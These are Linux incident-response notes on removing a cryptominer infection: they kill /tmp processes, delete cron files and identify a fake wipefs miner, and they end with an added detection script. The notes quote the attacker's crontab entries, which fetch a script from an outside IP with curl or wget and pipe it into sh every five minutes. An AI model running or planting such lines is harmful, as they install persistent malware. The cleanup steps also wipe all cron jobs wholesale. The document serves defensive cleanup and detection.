Linux commands
These two are probably scheduled tasks that periodically download the malware
# cat /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
# rm -fr /var/spool/cron/
# ps -aux|grep ddg
root 1565 0.0 0.3 198580 5832 ? Sl Mar27 0:48 /tmp/ddg.3001
root 31956 0.0 0.0 112660 976 pts/2 S+ 09:40 0:00 grep --color=auto ddg
# kill -9 1565
# ps -aux|grep imWBR1
root 31697 0.4 1.3 319948 25936 ? Ssl 09:15 0:07 /tmp/imWBR1
root 31970 0.0 0.0 112660 976 pts/2 S+ 09:41 0:00 grep --color=auto imWBR1
# kill -9 31697
# rm -f /tmp/ddg.*
# rm -rf /tmp/imWBR1
# cat /etc/crontab
I saw this scheduled task for wipefs. wipefs is normally a legitimate program, but top shows wipefs using a lot of CPU, so this one is a miner in disguise
0 */6 * * * root /bin/wipefs
# echo "" > /etc/crontab
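
The two signs found above (cron entries that pipe a download into sh, and processes running from /tmp) can be checked for with a small script. This is an added example, not part of the original notes; the function names are hypothetical and the sample crontab is constructed, using a documentation address.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): triage helpers for the two
# persistence signs shown above. Function names are hypothetical.

# Print file:line:entry for each non-comment cron line that downloads with
# curl/wget and pipes the result straight into a shell.
scan_cron() {
    grep -HnE '^[^#]*(curl|wget)[[:space:]][^|]*\|[[:space:]]*(ba|da)?sh([[:space:]]|$)' \
        "$@" 2>/dev/null
}

# Print "PID EXE" for each process whose executable is under a directory
# (default /tmp). Needs root to see other users' processes.
procs_running_from() {
    local dir=${1:-/tmp} p exe
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case $exe in
            "$dir"/*) printf '%s %s\n' "${p#/proc/}" "$exe" ;;
        esac
    done
}

# Constructed sample crontab (203.0.113.10 is a documentation address).
make_sample() {
    local f
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
# m h dom mon dow command
*/5 * * * * curl -fsSL http://203.0.113.10:8443/i.sh | sh
*/5 * * * * wget -q -O- http://203.0.113.10:8443/i.sh | sh
30 2 * * * /usr/local/bin/backup.sh
#*/5 * * * * curl -fsSL http://203.0.113.10:8443/i.sh | sh
EOF
    printf '%s\n' "$f"
}

sample=$(make_sample)
echo "Suspicious cron entries in constructed sample:"
scan_cron "$sample" || true
echo "Processes running from /tmp:"
procs_running_from /tmp
rm -f "$sample"
```

On a real host, pass the cron files themselves to scan_cron, for example /etc/crontab and the files under /var/spool/cron, and review the matches before deleting anything.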